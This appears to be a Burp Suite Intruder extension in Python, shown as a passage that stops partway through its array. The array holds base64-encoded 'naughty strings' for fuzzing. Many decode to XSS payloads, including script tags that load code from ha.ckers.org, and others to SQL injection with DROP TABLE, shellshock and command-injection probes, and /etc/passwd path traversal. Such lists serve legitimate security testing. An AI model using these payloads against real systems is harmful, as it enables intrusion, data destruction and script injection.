# By Vay3t
# https://github.com/minimaxir/big-list-of-naughty-strings

from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadProcessor
from burp import IIntruderPayloadGenerator

import base64

PAYLOADS = []

naughtlyStrings = [
    "0IHQgtCD0ITQhdCG0IfQiNCJ0IrQi9CM0I3QjtCP0JDQkdCS0JPQlNCV0JbQl9CY0JnQmtCb0JzQ",
    "0LrQu9C80L3QvtC/0YDRgdGC0YPRhNGF0YbRh9GI0YnRitGL0YzRjdGO0Y8=",
    "15HWsNa816jWtdeQ16nWtNeB15nXqiwg15HWuNa816jWuNeQINeQ1rHXnNa515TWtNeZ150sINeQ",
    "15TWuNeZ1rDXqta415R0ZXN02KfZhNi12YHYrdin2Kog2KfZhNiq2ZHYrdmI2YQ=",
    "1rXXqiDXlNa316nWuNa814HXnta315nWtNedLCDXldaw15DWtdeqINeU1rjXkNa416jWttel",
    "2Kkg2KjZitmGINmF2KcsINmK2LDZg9ixINin2YTYrdiv2YjYryDYo9mKINio2LnYrywg2YXYudin",
    "2KvZhSDZhtmB2LMg2LPZgti32Kog2YjYqNin2YTYqtit2K/Zitiv2IwsINis2LLZitix2KrZiiDY",
    "2LfZktio2ZDZitmC2Y7Yp9iq2Y8g2KfZhNmS2K3Yp9iz2Y/ZiNio2ZDZitmR2Y7YqdmP2Iw=",
    "2YLZjtin2KbZkNmF2Y7YqdmQINmI2Y7ZgdmQ2YrZhSDZitmO2K7Zj9i12ZHZjiDYp9mE2KrZkdmO",
    "2YXZhNipINio2YjZhNmG2K/Yp9iMINin2YTYpdi32YTYp9mCINi52YQg2KXZitmILg==",
    "2YXZj9mG2Y7Yp9mC2Y7YtNmO2KnZjyDYs9mP2KjZj9mE2ZAg2KfZkNiz2ZLYqtmQ2K7Zktiv2Y7Y",
    "2aDZodmi2aPZpNml2abZp9mo2ak=",
    "2aHZotmj",
    "2q/ahtm+2pg=",
    "44O7KO+/o+KIgO+/oynjg7s6Kjo=",
    "44O94Ly84LqI2YTNnOC6iOC8ve++iSDjg73gvLzguojZhM2c4LqI4Ly9776J",
    "44OR44O844OG44Kj44O844G46KGM44GL44Gq44GE44GL",
    "4LCc4LGN4LCe4oCM4LC+",
    "4LiU4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH",
    "4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmHIOC4lOC5ieC5ieC5ieC5ieC5",
    "4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ",
    "4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH",
    "4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmH",
    "4Zqb4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqA4ZqcCg==",
    "4Zqb4ZqE4ZqT4ZqQ4ZqL4ZqS4ZqE4ZqA4ZqR4ZqE4ZqC4ZqR4ZqP4ZqF4Zqc",
    "4bSJyZRz4bSJZOG0iXDJkCDJuW7Kh8edyofJlMedc3VvyZQgJ8qHx53Jr8mQIMqH4bSJcyDJuW9s",
    "4bmwzLrMusyVb82eIMy3acyyzKzNh8yqzZluzJ3Ml82VdsyfzJzMmMymzZ9vzLbMmcywzKBrw6jN",
    "4oCpdGVzdOKAqQ==",
    "4oCq4oCqdGVzdOKAqg==",
    "4oCrdGVzdOKAqw==",
    "4oGmdGVzdOKBpw==",
    "4oGw4oG04oG1",
    "4oGw4oG04oG14oKA4oKB4oKC",
    "4oKA4oKB4oKC",
    "4oWb4oWc4oWd4oWe",
    "4p2k77iPIPCfkpQg8J+SjCDwn5KVIPCfkp4g8J+SkyDwn5KXIPCfkpYg8J+SmCDwn5KdIPCfkp8g",
    "4pKv4pKj4pKgIOKSrOKSsOKSpOKSnuKSpiDikp3ikq3ikqrikrLikqkg4pKh4pKq4pKzIOKSpeKS",
    "4pSs4pSA4pSs44OOKCDCuiBfIMK644OOKQ==",
    "4pyL8J+PvyDwn5Kq8J+PvyDwn5GQ8J+PvyDwn5mM8J+PvyDwn5GP8J+PvyDwn5mP8J+Pvw==",
    "55Sw5Lit44GV44KT44Gr44GC44GS44Gm5LiL44GV44GE",
    "56S+5pyD56eR5a246Zmi6Kqe5a2456CU56m25omA",
    "5ZKM6KO95ryi6Kqe",
    "6KGo44Od44GCQem3l8WSw6nvvKLpgI3DnMOfwqrEhcOx5LiC45CA8KCAgA==",
    "6YOo6JC95qC8",
    "77++",
    "772A772oKMK04oiA772A4oip",
    "776f772l4py/44O+4pWyKO+9oeKXleKAv+KXle+9oSnilbHinL/vvaXvvp8=",
    "77e6",
    "77e9",
    "77iP4oOjIDjvuI/ig6MgOe+4j+KDoyDwn5Sf",
    "77u/",
    "77y0772I772FIO+9ke+9le+9ie+9g++9iyDvvYLvvZLvvY/vvZfvvY4g772G772P772YIO+9iu+9",
    "77yR77yS77yT",
    "77ycc2NyaXB077yeYWxlcnQoMTIzKe+8nC9zY3JpcHTvvJ4=",
    "7IKs7ZqM6rO87ZWZ7JuQIOyWtO2VmeyXsOq1rOyGjA==",
    "7Jq4656A67CU7Yag66W0",
    "7LCm7LCo66W8IO2DgOqzoCDsmKgg7Y6y7Iuc66eo6rO8IOyRm+uLpOumrCDrmKDrsKnqsIHtlZg=",
    "86CBjPOggY3zoIGO86CBj/OggZDzoIGR86CBkvOggZPzoIGU86CBlfOggZbzoIGX86CBmPOggZnz",
    "8J+HuvCfh7jwn4e38J+HuvCfh7gg8J+HpvCfh6vwn4em8J+HsvCfh7g=",
    "8J+HuvCfh7jwn4e38J+HuvCfh7jwn4em",
    "8J+HuvCfh7jwn4e38J+HuvCfh7jwn4em8J+Hq/Cfh6bwn4ey",
    "8J+PszDwn4yI77iP",
    "8J+QtSDwn5mIIPCfmYkg8J+Zig==",
    "8J+RqOKAjfCfprAg8J+RqPCfj7/igI3wn6awIPCfkajigI3wn6axIPCfkajwn4+/4oCN8J+msSDwn6a58J+Pv+KAjeKZgu+4jw==",
    "8J+RqfCfj70=",
    "8J+RviDwn5mHIPCfkoEg8J+ZhSDwn5mGIPCfmYsg8J+ZjiDwn5mN",
    "8J+SnCDwn5KbIPCfkpog8J+SmQ==",
    "8J+YjQ==",
    "8J+aviDwn4aSIPCfhpMg8J+GlSDwn4aWIPCfhpcg8J+GmSDwn4+n",
    "8J2Qk/CdkKHwnZCeIPCdkKrwnZCu8J2QovCdkJzwnZCkIPCdkJvwnZCr8J2QqPCdkLDwnZCnIPCd",
    "8J2QniDwnZCl8J2QmvCdkLPwnZCyIPCdkJ3wnZCo8J2QoA==",
    "8J2Ru/CdkonwnZKGIPCdkpLwnZKW8J2SivCdkoTwnZKMIPCdkoPwnZKT8J2SkPCdkpjwnZKPIPCd",
    "8J2ShiDwnZKN8J2SgvCdkpvwnZKaIPCdkoXwnZKQ8J2SiA==",
    "8J2To/Cdk7HwnZOuIPCdk7rwnZO+8J2TsvCdk6zwnZO0IPCdk6vwnZO78J2TuPCdlIDwnZO3IPCd",
    "8J2TriDwnZO18J2TqvCdlIPwnZSCIPCdk63wnZO48J2TsA==",
    "8J2Vi/CdlZnwnZWWIPCdlaLwnZWm8J2VmvCdlZTwnZWcIPCdlZPwnZWj8J2VoPCdlajwnZWfIPCd",
    "8J2VliDwnZWd8J2VkvCdlavwnZWqIPCdlZXwnZWg8J2VmA==",
    "8J2Vv/Cdlo3wnZaKIPCdlpbwnZaa8J2WjvCdlojwnZaQIPCdlofwnZaX8J2WlPCdlpzwnZaTIPCd",
    "8J2WiiDwnZaR8J2WhvCdlp/wnZaeIPCdlonwnZaU8J2WjA==",
    "8J2ag/CdmpHwnZqOIPCdmprwnZqe8J2akvCdmozwnZqUIPCdmovwnZqb8J2amPCdmqDwnZqXIPCd",
    "8J2ajiDwnZqV8J2aivCdmqPwnZqiIPCdmo3wnZqY8J2akA==",
    "8JuyoPCbsqHwm7Ki8Juyo/CdhbPwnYW08J2FtfCdhbbwnYW38J2FuPCdhbnwnYW686CAgfOggKDz",
    "8KCcjvCgnLHwoJ258KCxk/CgsbjwoLKW8KCzjw==",
    "AQIDBAUGBwgODxAREhMUFRYXGBkaGxwdHh9/",
    "CwwgwoXCoOGagOKAgOKAgeKAguKAg+KAhOKAheKAhuKAh+KAiOKAieKAiuKAi+KAqOKAqeKAr+KB",
    "IG9uZXJyb3I9amF2YXNjcmlwdDphbGVydCgxKT48L2E+Ij4=",
    "IHdoZXJlIHRoaXMgbWVzc2FnZSB3aWxsIGVuZCB1cCBpbiB5b3VyIGRyZWFtLCBidXQgd2UgaG9w",
    "IUAjJCVeJiooKWB+",
    "Ig==",
    "IiBhdXRvZm9jdXMgb25rZXl1cD0iamF2YXNjcmlwdDphbGVydCgxMjMp",
    "IiBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTIzKSBhdXRvZm9jdXM=",
    "IiI=",
    "IiciJyInJycnIg==",
    "IicnJyciJyI=",
    "Ij48c2NyaXB0PmFsZXJ0KDEyMyk7PC9zY3JpcHQgeD0i",
    "Ij48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4=",
    "IjthbGVydCgxMjMpO3Q9Ig==",
    "ImAnPjxzY3JpcHQ+LWphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHg3RWphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgwMGphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgwOWphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgwQ2phdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgwQWphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgwQmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgwRGphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgyMGphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgyMWphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgyQmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHgzQmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "ImAnPjxzY3JpcHQ+XHhDMlx4ODVqYXZhc2NyaXB0OmFsZXJ0KDEpPC9zY3JpcHQ+",
    "ImAnPjxzY3JpcHQ+XHhDMlx4QTBqYXZhc2NyaXB0OmFsZXJ0KDEpPC9zY3JpcHQ+",
    "ImAnPjxzY3JpcHQ+XHhFM1x4ODBceDgwamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMVx4OUFceDgwamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMVx4QTBceDhFamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg0amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg1amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg2amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg3amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg4amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg5amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgwamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgxamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgyamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgzamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDhBamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDhCamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEE4amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEE5amF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEFGamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFMlx4ODFceDlGamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFRlx4QkJceEJGamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFRlx4QkZceEFFamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhFRlx4QkZceEJFamF2YXNjcmlwdDphbGVydCgxKTwvc2NyaXB0Pg==",
    "ImAnPjxzY3JpcHQ+XHhGMFx4OTBceDk2XHg5QWphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "J2AiPjxceDAwc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "J2AiPjxceDNDc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=",
    "JCh0b3VjaCAvdG1wL2JsbnMuZmFpbCk=",
    "JDEuMDA=",
    "JEVOVnsnSE9NRSd9",
    "JEhPTUU=",
    "JFVTRVI=",
    "JQ==",
    "JSouKnM=",
    "JUA=",
    "JW4=",
    "JWQ=",
    "JXMlcyVzJXMlcw==",
    "JXgoJ2xzIC1hbCAvJyk=",
    "JiMwMDAwMDg4JiMwMDAwMDgzJiMwMDAwMDgzJiMwMDAwMDM5JiMwMDAwMDQxPg==",
    "JiN4MjcmI3gyOT4=",
    "Jmx0O3NjcmlwdCZndDthbGVydCgmIzM5OzEyMyYjMzk7KTsmbHQ7L3NjcmlwdCZndDs=",
    "Jw==",
    "JyBPUiAnMSc9JzE=",
    "JyBPUiAxPTEgLS0gMQ==",
    "JyBhdXRvZm9jdXMgb25rZXl1cD0namF2YXNjcmlwdDphbGVydCgxMjMp",
    "JyBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTIzKSBhdXRvZm9jdXM=",
    "JyIn",
    "Jyc=",
    "Jz48c2NyaXB0PmFsZXJ0KDEyMyk7PC9zY3JpcHQgeD0n",
    "Jz48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4=",
    "JzthbGVydCgxMjMpO3Q9Jw==",
    "KCDNocKwIM2cypYgzaHCsCk=",
    "KCkgeyAwOyB9OyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazEuZmFpbDs=",
    "KCkgeyBfOyB9ID5fWyQoJCgpKV0geyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazIuZmFpbDsg",
    "KG51bGwp",
    "KO++ieCypeebiuCype+8ie++ie+7vyDilLvilIHilLs=",
    "KO+9oeKXlSDiiIAg4peV772hKQ==",
    "KOKVr8Kw4pahwrDvvInila/vuLUg4pS74pSB4pS7KQ==",
    "KysrQVRIMA==",
    "KzA=",
    "KzAuMA==",
    "L2Rldi9udWxsOyB0b3VjaCAvdG1wL2JsbnMuZmFpbCA7IGVjaG8=",
    "LA==",
    "LC4vOydbXVwtPQ==",
    "LOOAguODuzoqOuODu+OCnOKAmSgg4pi7IM+JIOKYuyAp44CC44O7Oio644O744Kc4oCZ",
    "LQ==",
    "LS0+PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+",
    "LS0=",
    "LS0x",
    "LS12ZXJzaW9u",
    "LS1oZWxw",
    "LS4=",
    "LSQxLjAw",
    "LSw=",
    "LTA=",
    "LTAuMA==",
    "LTE=",
    "LTEjSU5E",
    "LTEuMDA=",
    "LTEvMg==",
    "LTFFKzAy",
    "LTFFMDI=",
    "LTFFMg==",
    "LTIxNDc0ODM2NDgvLTE=",
    "LTkyMjMzNzIwMzY4NTQ3NzU4MDgvLTE=",
    "LUluZmluaXR5",
    "Lg==",
    "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2hvc3Rz",
    "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==",
    "MA==",
    "MC4uMA==",
    "MC4wLjA=",
    "MC4wLzA=",
    "MC4wLzAuMA==",
    "MC4wMA==",
    "MC8w",
    "MCwsMA==",
    "MCwwLDA=",
    "MCwwLzAsMA==",
    "MCwwMA==",
    "MDAwMDk5JiMwMDAwMTE0JiMwMDAwMTA1JiMwMDAwMTEyJiMwMDAwMTE2JiMwMDAwMDU4JiMwMDAw",
    "MDDLmcaWJC0=",
    "MDEwMDA=",
    "MDg=",
    "MDk3JiMwMDAwMTA4JiMwMDAwMTAxJiMwMDAwMTE0JiMwMDAwMTE2JiMwMDAwMDQwJiMwMDAwMDM5",
    "MDk=",
    "MHgw",
    "MHhhYmFkMWRlYQ==",
    "MHhmZmZmZmZmZg==",
    "MHhmZmZmZmZmZmZmZmZmZmZm",
    "MO+4j+KDoyAx77iP4oOjIDLvuI/ig6MgM++4j+KDoyA077iP4oOjIDXvuI/ig6MgNu+4j+KDoyA3",
    "MQ==",
    "MS4wLzAuMA==",
    "MS4wMA==",
    "MS4wMDAsMDA=",
    "MS4wMDAuMDAwLDAw",
    "MS8w",
    "MS8y",
    "MSAwMDAgMDAwLDAw",
    "MSAwMDAgMDAwLjAw",
    "MSAwMDAsMDA=",
    "MSAwMDAuMDA=",
    "MSNJTkQ=",
    "MSNJTkY=",
    "MSNRTkFO",
    "MSNTTkFO",
    "MSc7IERST1AgVEFCTEUgdXNlcnMtLSAx",
    "MScwMDAnMDAwLDAw",
    "MScwMDAnMDAwLjAw",
    "MScwMDAsMDA=",
    "MScwMDAuMDA=",
    "MSkiPkRFRg==",
    "MSwwLzAsMA==",
    "MSwwMDAsMDAwLjAw",
    "MSwwMDAuMDA=",
    "MTI7JiMxMTY7JiM1ODsmIzk3OyYjMTA4OyYjMTAxOyYjMTE0OyYjMTE2OyYjNDA7JiMzOTsmIzg4",
    "MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5",
    "MTtEUk9QIFRBQkxFIHVzZXJz",
    "MUUrMDI=",
    "MUUwMg==",
    "MUUy",
    "Mi4yMjUwNzM4NTg1MDcyMDExZS0zMDg=",
    "MjAgeWVhcnMgbm93LiBXZSdyZSB0cnlpbmcgYSBuZXcgdGVjaG5pcXVlLiBXZSBkb24ndCBrbm93",
    "NzQmI3gzQSYjeDYxJiN4NkMmI3g2NSYjeDcyJiN4NzQmI3gyOCYjeDI3JiN4NTgmI3g1MyYjeDUz",
    "O2FsZXJ0KDEyMyk7",
    "OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5",
    "OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5",
    "OyYjODM7JiM4MzsmIzM5OyYjNDE7Pg==",
    "PC90ZXh0YXJlYT48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4=",
    "PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+",
    "PCAvIHNjcmlwdCA+PCBzY3JpcHQgPmFsZXJ0KDEyMyk8IC8gc2NyaXB0ID4=",
    "PCEtLVtpZjxpbWcgc3JjPXggb25lcnJvcj1qYXZhc2NyaXB0OmFsZXJ0KDEpLy9dPiAtLT4=",
    "PCEtLVtpZl0+PHNjcmlwdD5qYXZhc2NyaXB0OmFsZXJ0KDEpPC9zY3JpcHQgLS0+",
    "PD4/OiJ7fXxfKw==",
    "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28g",
    "PDw8ICVzKHVuPSclcycpID0gJXU=",
    "PDxTQ1JJUFQ+YWxlcnQoIlhTUyIpOy8vPDwvU0NSSVBUPg==",
    "PEJPRFkgb25sb2FkISMkJSYoKSp+Ky1fLiw6Oz9AWy98XF1eYD1hbGVydCgiWFNTIik+",
    "PElNRyAiIiI+PFNDUklQVD5hbGVydCgiWFNTIik8L1NDUklQVD4iPg==",
    "PElNRyBTUkM9IG9ubW91c2VvdmVyPSJhbGVydCgneHhzJykiPg==",
    "PElNRyBTUkM9IiAmIzE0OyAgamF2YXNjcmlwdDphbGVydCgnWFNTJyk7Ij4=",
    "PElNRyBTUkM9ImphdiAgIGFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+",
    "PElNRyBTUkM9ImphdiYjeDA5O2FzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+",
    "PElNRyBTUkM9ImphdiYjeDBBO2FzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+",
    "PElNRyBTUkM9ImphdiYjeDBEO2FzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+",
    "PElNRyBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIg==",
    "PElNRyBTUkM9IyBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3h4cycpIj4=",
    "PElNRyBTUkM9JiMwMDAwMTA2JiMwMDAwMDk3JiMwMDAwMTE4JiMwMDAwMDk3JiMwMDAwMTE1JiMw",
    "PElNRyBTUkM9JiMxMDY7JiM5NzsmIzExODsmIzk3OyYjMTE1OyYjOTk7JiMxMTQ7JiMxMDU7JiMx",
    "PElNRyBTUkM9JiN4NkEmI3g2MSYjeDc2JiN4NjEmI3g3MyYjeDYzJiN4NzImI3g2OSYjeDcwJiN4",
    "PElNRyBTUkM9amF2YXNjcmlwdDphbGVydChTdHJpbmcuZnJvbUNoYXJDb2RlKDg4LDgzLDgzKSk+",
    "PElNRyBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3h4cycpIj4=",
    "PFNDUklQVC9TUkM9Imh0dHA6Ly9oYS5ja2Vycy5vcmcveHNzLmpzIj48L1NDUklQVD4=",
    "PFNDUklQVC9YU1MgU1JDPSJodHRwOi8vaGEuY2tlcnMub3JnL3hzcy5qcyI+PC9TQ1JJUFQ+",
    "PFNDUklQVCBTUkM9Ly9oYS5ja2Vycy5vcmcvLmo+",
    "PFNDUklQVCBTUkM9aHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanM/PCBCID4=",
    "PGEgaHJlZj0iXHgwM2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwMmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwN2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwNGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwNmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwOWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwQ2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwQWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwRGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwRWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgwRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxM2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxMmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxN2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxNGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxNmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxOWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxQ2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxQWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxRGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxRWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgxRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHgyMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt",
    "PGEgaHJlZj0iXHhDMlx4QTBqYXZhc2NyaXB0OmphdmFzY3JpcHQ6YWxlcnQoMSkiIGlkPSJmdXp6",
    "PGEgaHJlZj0iXHhFM1x4ODBceDgwamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEpIiBpZD0i",
